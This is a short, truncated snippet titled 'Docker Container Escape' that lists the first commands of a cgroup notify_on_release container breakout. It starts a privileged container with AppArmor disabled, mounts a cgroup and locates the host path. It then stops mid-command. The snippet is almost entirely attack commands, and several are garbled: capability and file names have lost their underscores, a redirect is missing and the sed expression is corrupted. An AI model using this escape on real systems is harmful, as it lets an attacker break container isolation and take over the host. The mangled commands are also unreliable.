Docker Container Escape

On the host docker run --rm -it --cap-add=SYSADMIN --security-opt apparmor=unconfined ubuntu bash In the container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 /tmp/cgrp/x/notifyonrelease hostpath=sed -n 's/.\perdir=^,./\1/p' /etc/mtab echo...